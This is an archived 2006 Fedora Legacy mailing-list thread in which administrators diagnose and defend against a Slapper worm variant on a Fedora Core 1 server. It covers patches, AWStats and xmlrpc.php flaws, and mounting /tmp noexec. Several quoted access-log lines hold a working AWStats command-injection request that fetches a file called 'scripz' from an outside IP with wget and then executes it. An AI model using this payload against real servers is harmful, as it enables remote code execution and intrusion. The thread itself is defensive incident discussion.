Re: slapper worm
On 2006-01-24 08:46:24 +1000, Michael Mansour wrote: More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult. This doesn't really prevent execution of programs on /tmp, it just makes it more difficult. It is useful against worms which don't expect /tmp to be mounted noexec, though. (In other words: It works as long as only a few people use this trick) Definately noted as one of the measures to stop this type of attack, but for this particular server, /tmp is not a mounted filesystem but part of /, so I can't really do that without re-partitioning the disk and creating a dedicated /tmp. You could put /tmp on a tmpfs: /etc/fstab: none /tmp tmpfs noexec 0 0 hp -- _ | Peter J. Holzer| If I wanted to be academically correct, |_|_) | Sysadmin WSR | I'd be programming in Java. | | | [EMAIL PROTECTED] | I don't, and I'm not. __/ | http://www.hjp.at/ | -- Jesse Erlbaum on dbi-users pgpablwhfuGVZ.pgp Description: PGP signature -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
Hi Peter, On 2006-01-24 08:46:24 +1000, Michael Mansour wrote: More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult. This doesn't really prevent execution of programs on /tmp, it just makes it more difficult. It is useful against worms which don't expect /tmp to be mounted noexec, though. (In other words: It works as long as only a few people use this trick) Definately noted as one of the measures to stop this type of attack, but for this particular server, /tmp is not a mounted filesystem but part of /, so I can't really do that without re-partitioning the disk and creating a dedicated /tmp. You could put /tmp on a tmpfs: /etc/fstab: none /tmp tmpfs noexec 0 0 That's actually a very good idea, I forgot about that. But I thought it was more like: /dev/shm /tmp tmpfs noexec,size=512M,mode=777 0 0 ie. I'd have to use the /dev/shm device instead of none ? Actually, I forgot whether the tmpfs automatically adds the sticky bit on /tmp, or would I need to change the mode to 1777 ? Michael. -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
On 2006-01-24 22:13:26 +1000, Michael Mansour wrote: Hi Peter, On 2006-01-24 08:46:24 +1000, Michael Mansour wrote: Definately noted as one of the measures to stop this type of attack, but for this particular server, /tmp is not a mounted filesystem but part of /, so I can't really do that without re-partitioning the disk and creating a dedicated /tmp. You could put /tmp on a tmpfs: /etc/fstab: none /tmp tmpfs noexec 0 0 That's actually a very good idea, I forgot about that. But I thought it was more like: /dev/shm /tmp tmpfs noexec,size=512M,mode=777 0 0 ie. I'd have to use the /dev/shm device instead of none ? The device is ignored for filesystems which don't really use any device (like proc, sys, tmpfs, etc.).It might be a good idea to use a more descriptive string than none, though. Actually, I forgot whether the tmpfs automatically adds the sticky bit on /tmp, or would I need to change the mode to 1777 ? The default mode is 1777. If you explicitely set the mode to 777, the sticky bit isn't set. hp -- _ | Peter J. Holzer| If I wanted to be academically correct, |_|_) | Sysadmin WSR | I'd be programming in Java. | | | [EMAIL PROTECTED] | I don't, and I'm not. __/ | http://www.hjp.at/ | -- Jesse Erlbaum on dbi-users pgpoa0iXhxcWA.pgp Description: PGP signature -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
Michael Mansour wrote: Hi Marc, On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote: No I'm not sure. Reading through the link above, it does seem that you've hit the nail on the head with this one. I have two other FC1 machines and they weren't affected by Slapper (even when the 3rd one was). The FC1 machine that was, had the xmlrpc.php file which I've now removed. Hi Michael, Do you know what installed the xmlrpc.php file? Was it something that came with FC1, or was it something you installed yourself? I'm just trying to make sure Fedora Legacy has everything covered. It came from Drupal. Michael. That sounds like the xmlrpc exploit for the pear library. I got hit by that a few months ago. I was running b2evolution, but drupal was affected as well. My host was a FC4 box with all updates in place (w/mod_security and selinux enabled). I had to rebuild because I wasn't sure the box was comprimised, but it was vulnerable (the exploit worked) and it was under attack. Jason -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jesse Keating wrote: On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote: My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. Do you have a CVE for the ssl issue? I'd like to see if it is somewhere in the QA pipeline. Jesse, Just checked this morning. https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175406 But, I think we may need to do something pro actively... I'm seeing many posting either not knowing about this worm or not knowing if they are protected or how vulnerable they may be. Many use (or using) WebAdmin for simple configuration or installing other software making them more vulnerable. My FC1 box was not vulnerable, only because I like to use the command line and edit files manually instead of by web-pages. What we need is a comprehensive fix to prevent all this from happening unknowingly to the users. Or a way of checking before they get infected. James -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFD1jRxkNLDmnu1kSkRAlmuAJ9E/0owV13AuVZOxK+I0F859ZRCYACffnal zuVC11nLSrrGWJMEucMAswg= =0ZT6 -END PGP SIGNATURE- -- Scanned by ClamAV - http://www.clamav.net -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
James Kosin wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jesse Keating wrote: On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote: My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. Do you have a CVE for the ssl issue? I'd like to see if it is somewhere in the QA pipeline. Jesse, Just checked this morning. https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175406 But, I think we may need to do something pro actively... I'm seeing many posting either not knowing about this worm or not knowing if they are protected or how vulnerable they may be. [snip] I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago? Mike -- p=p=%c%s%c;main(){printf(p,34,p,34);};main(){printf(p,34,p,34);} This message made from 100% recycled bits. You have found the bank of Larn. I can explain it for you, but I can't understand it for you. I speak only for myself, and I am unanimous in that! -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago? Read the link I posted yesterday, according to them, it's been rewritten to exploit new ways to get in to your box. http://www.lurhq.com/slapperv2.html Regards, Mike Klinke -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
On Tue, 2006-01-24 at 13:20 -0600, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago? Read the link I posted yesterday, according to them, it's been rewritten to exploit new ways to get in to your box. http://www.lurhq.com/slapperv2.html This exploit can be managed. Please see http://www.modsecurity.org/ Apparently, this is known and requires updating of xmlrpm.php libraries. -- G. Roderick Singleton [EMAIL PROTECTED] PATH tech -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
Mike McCarty wrote: Gene Heskett wrote: On Tuesday 24 January 2006 14:20, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago? Read the link I posted yesterday, according to them, it's been rewritten to exploit new ways to get in to your box. http://www.lurhq.com/slapperv2.html If this file mentioned on the site doesn't exist on any of my systems, is it safe to assume relative safety against this attack? I would think so when combined with the ISP's (vz) blocking of port 80, but what do I know... Thats why I asked, Mike. I suppose you mean Mike Klinke and not Mike McCarty :-) I dunno. I just ran # find / -nmae xmlrpc.php -print What I get for typing that in instead of cut and paste. Of course, that was name not nmae. Mike -- p=p=%c%s%c;main(){printf(p,34,p,34);};main(){printf(p,34,p,34);} This message made from 100% recycled bits. You have found the bank of Larn. I can explain it for you, but I can't understand it for you. I speak only for myself, and I am unanimous in that! -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mike McCarty wrote: --snip-- $ ps -A | grep pache $ ps -A | grep ssl doesn't show anything, so Apache isn't running, and I guess SSL isn't either. Mike Mike, ps -A | grep httpd /* Apache is only the name of the server not the rpm or application running */ SSL is a module of apache that allows SSL connections the actual name of the module is mod_ssl and it usually enabled in the default apache configuration for redhat/fedora. James -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFD1pWUkNLDmnu1kSkRAkFaAJ9ADF/2hwQysfKseqWrOW0eRvwrTACePBf/ sRmQ1APq2dcjkRMHYOZct3M= =dR8+ -END PGP SIGNATURE- -- Scanned by ClamAV - http://www.clamav.net -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
Hi Mike, You should do a netstat -na | grep SYN, if you see alot of those then slapper is there DOS attacking people. $ netstat -na | grep SYN $ Thanks for the advice. But, as I am behind a stealth firewall, I feel relatively secured against *this* type of attack. Umm, what does there DOS attacking people? I had problems parsing that. I should have written it DoS, stands for Denial of Service. Michael. -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
On Tuesday 24 January 2006 14:00, Gene Heskett wrote: If this file mentioned on the site doesn't exist on any of my systems, is it safe to assume relative safety against this attack? As Michael Mansour discovered, he had this file on only one of three FC1 machines after he installed Drupal, a content management package. If you don't have it on your system you should be fine from this particular attack ( Also note the comments about the Awstats package in the link I sent ). Regards, Mike Klinke -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
that's a coincidence... just today when i checked the apache server-status page i notice that some host was scanning several sites randomly trying to find a xmlrpc.php in different apparently pre defined locations. i was aware of the xmlrpc bug in pear and already checked if it was on my server but it wasnt... to make sure i immediatly ran a locate and find again and nothing came up... also blocked the source ip and since then everything is quiet again. so i guess this so called slapper is still very active. From: Mike McCarty [EMAIL PROTECTED] Reply-To: Discussion of the Fedora Legacy Project fedora-legacy-list@redhat.com To: Discussion of the Fedora Legacy Project fedora-legacy-list@redhat.com Subject: Re: slapper worm Date: Tue, 24 Jan 2006 13:08:52 -0600 James Kosin wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jesse Keating wrote: On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote: My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. Do you have a CVE for the ssl issue? I'd like to see if it is somewhere in the QA pipeline. Jesse, Just checked this morning. https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175406 But, I think we may need to do something pro actively... I'm seeing many posting either not knowing about this worm or not knowing if they are protected or how vulnerable they may be. [snip] I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago? Mike -- p=p=%c%s%c;main(){printf(p,34,p,34);};main(){printf(p,34,p,34);} This message made from 100% recycled bits. You have found the bank of Larn. I can explain it for you, but I can't understand it for you. I speak only for myself, and I am unanimous in that! -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list _ Express yourself instantly with MSN Messenger! Download today - it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/ -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
On Tuesday 24 January 2006 15:18, Mike McCarty wrote: Gene Heskett wrote: On Tuesday 24 January 2006 14:20, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago? Read the link I posted yesterday, according to them, it's been rewritten to exploit new ways to get in to your box. http://www.lurhq.com/slapperv2.html If this file mentioned on the site doesn't exist on any of my systems, is it safe to assume relative safety against this attack? I would think so when combined with the ISP's (vz) blocking of port 80, but what do I know... Thats why I asked, Mike. I suppose you mean Mike Klinke and not Mike McCarty :-) Well (chuckle), I was replying to Mike Klinke, but anyone who knows the answer is welcome to chime in with their 2 cents. I dunno. I just ran # find / -nmae xmlrpc.php -print and didn't come up with anything. But that's expected, since I run behind a router set up as a firewall, completely stealth except for the e-mail challenge port (which is closed). A $ ps -A | grep pache $ ps -A | grep ssl doesn't show anything, so Apache isn't running, and I guess SSL isn't either. Mike IIRC the httpd is running on that box as I used localhost:631 to configure cups not too long ago, which reminds me, I need to redo that because I've traded gutenprint-5.0.0beta2 for gutenprint-5.0.0-rc2 on this, the print server. But thats a RH7.3 box so the apache is a 1.3.something, but uptodate AFAIK. -- Cheers, Gene People having trouble with vz bouncing email to me should add the word 'online' between the 'verizon', and the dot which bypasses vz's stupid bounce rules. I do use spamassassin too. :-) Yahoo.com and AOL/TW attorneys please note, additions to the above message by Gene Heskett are: Copyright 2005 by Maurice Eugene Heskett, all rights reserved. -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
On Tuesday 24 January 2006 15:29, Mike McCarty wrote: Mike McCarty wrote: Gene Heskett wrote: On Tuesday 24 January 2006 14:20, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago? Read the link I posted yesterday, according to them, it's been rewritten to exploit new ways to get in to your box. http://www.lurhq.com/slapperv2.html If this file mentioned on the site doesn't exist on any of my systems, is it safe to assume relative safety against this attack? I would think so when combined with the ISP's (vz) blocking of port 80, but what do I know... Thats why I asked, Mike. I suppose you mean Mike Klinke and not Mike McCarty :-) I dunno. I just ran # find / -nmae xmlrpc.php -print What I get for typing that in instead of cut and paste. Of course, that was name not nmae. Chuckle. A classic example of hindsight being 20-10 or better. It happens to the best of us. Mike -- Cheers, Gene People having trouble with vz bouncing email to me should add the word 'online' between the 'verizon', and the dot which bypasses vz's stupid bounce rules. I do use spamassassin too. :-) Yahoo.com and AOL/TW attorneys please note, additions to the above message by Gene Heskett are: Copyright 2005 by Maurice Eugene Heskett, all rights reserved. -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Michael Mansour wrote: Hi guys, I have an FC1 machine which got infected twice with the slapper worm, and then started DOS attacking a large vendor. I've stopped slapper in its tracks with a couple of changes to FC1, but in analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache SSL server which I've now turned off), I see the following bit of interest in my apache access_log: 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 404 340 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) These scripz files end up going into /tmp, being compiled with gcc, renamed to httpd and run as that. I'm using: perl-5.8.3-17.4.legacy httpd-2.0.51-1.9.legacy openssl-0.9.7a-33.13.legacy Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? Michael. Michael, Try my version of httpd here: http://support.intcomgrp.com/~jkosin It has been effective against the worm so far. James Kosin -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFD1T+ukNLDmnu1kSkRAv20AJ0d7pl7B6zAOZb+OmhkiiKG/Fpp1ACfcnmE gJoc286M9LvSAXn2cjXHEok= =5ZOF -END PGP SIGNATURE- -- Scanned by ClamAV - http://www.clamav.net -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
Hi James, -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Michael Mansour wrote: Hi guys, I have an FC1 machine which got infected twice with the slapper worm, and then started DOS attacking a large vendor. I've stopped slapper in its tracks with a couple of changes to FC1, but in analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache SSL server which I've now turned off), I see the following bit of interest in my apache access_log: 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 404 340 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) These scripz files end up going into /tmp, being compiled with gcc, renamed to httpd and run as that. I'm using: perl-5.8.3-17.4.legacy httpd-2.0.51-1.9.legacy openssl-0.9.7a-33.13.legacy Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? Michael. Michael, Try my version of httpd here: http://support.intcomgrp.com/~jkosin It has been effective against the worm so far. Thanks, I will actually try them out today. Have you considered making a yum/apt repo for your packages? it'll make it much easier to yum to newer releases when you have them, and it's quite easy to make a yum/apt repo. Michael. -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
On Mon, 2006-01-23 at 15:42 -0500, James Kosin wrote: Michael, Try my version of httpd here: http://support.intcomgrp.com/~jkosin It has been effective against the worm so far. James, what is in your package that we haven't included in our Apache? I was under the assumption that we had fixed all the CVEs related to the slapper worm and that our users were safe. If this isn't the case, we have a severe problem and need to fix this immediately. -- Jesse Keating RHCE (geek.j2solutions.net) Fedora Legacy Team (www.fedoralegacy.org) GPG Public Key (geek.j2solutions.net/jkeating.j2solutions.pub) signature.asc Description: This is a digitally signed message part -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
Michael Mansour wrote: 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 404 340 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) ... Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? You might also want to make sure you're using a current version of AWStats. IIRC this flaw was fixed in either 6.3 or 6.4, and the current version is 6.5. (If you don't have awstats.pl on your system, then these lines are just probes and aren't relevant to your problem.) More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult. -- Kelson Vibber SpeedGate Communications www.speed.net -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jesse Keating wrote: James, what is in your package that we haven't included in our Apache? I was under the assumption that we had fixed all the CVEs related to the slapper worm and that our users were safe. If this isn't the case, we have a severe problem and need to fix this immediately. Jesse, Hi. I think it was fixed with the updates to perl by the update. But, that said, he could have a WebAdmin install that makes him vulnerable again. My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. My version does add the mod_security module to Apache which should help with this and other worms that try to access via this type of method. James -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFD1VSAkNLDmnu1kSkRAuV5AJ4tHYj1a7HHknypuE0F0UhJyYDL7QCeKHDq DB1v27kblhsQGeIJdpyGEjI= =ywd9 -END PGP SIGNATURE- -- Scanned by ClamAV - http://www.clamav.net -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
Hi Kelson, Michael Mansour wrote: 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 404 340 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) ... Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? You might also want to make sure you're using a current version of AWStats. IIRC this flaw was fixed in either 6.3 or 6.4, and the current version is 6.5. Yeah, I run awstats 6.5 on that system. (If you don't have awstats.pl on your system, then these lines are just probes and aren't relevant to your problem.) More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult. Definately noted as one of the measures to stop this type of attack, but for this particular server, /tmp is not a mounted filesystem but part of /, so I can't really do that without re-partitioning the disk and creating a dedicated /tmp. Thanks. Michael. -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote: My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. Do you have a CVE for the ssl issue? I'd like to see if it is somewhere in the QA pipeline. -- Jesse Keating RHCE (geek.j2solutions.net) Fedora Legacy Team (www.fedoralegacy.org) GPG Public Key (geek.j2solutions.net/jkeating.j2solutions.pub) signature.asc Description: This is a digitally signed message part -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote: I'm using: perl-5.8.3-17.4.legacy httpd-2.0.51-1.9.legacy openssl-0.9.7a-33.13.legacy Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? What version of php are you running? Marc. signature.asc Description: This is a digitally signed message part -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
Hi Marc, On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote: I'm using: perl-5.8.3-17.4.legacy httpd-2.0.51-1.9.legacy openssl-0.9.7a-33.13.legacy Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? What version of php are you running? php-4.3.11-1.fc1.3.legacy Michael. -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
Hi Marc, On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote: No I'm not sure. Reading through the link above, it does seem that you've hit the nail on the head with this one. I have two other FC1 machines and they weren't affected by Slapper (even when the 3rd one was). The FC1 machine that was, had the xmlrpc.php file which I've now removed. Hi Michael, Do you know what installed the xmlrpc.php file? Was it something that came with FC1, or was it something you installed yourself? I'm just trying to make sure Fedora Legacy has everything covered. It came from Drupal. Michael. -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
On Monday 23 January 2006 14:32, Michael Mansour wrote: 403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scrip z%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 404 340 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) These scripz files end up going into /tmp, being compiled with gcc, renamed to httpd and run as that. I'm using: perl-5.8.3-17.4.legacy httpd-2.0.51-1.9.legacy openssl-0.9.7a-33.13.legacy Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? Michael. Are you sure it's using an SSL exploit? http://www.lurhq.com/slapperv2.html Regards, Mike Klinke -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list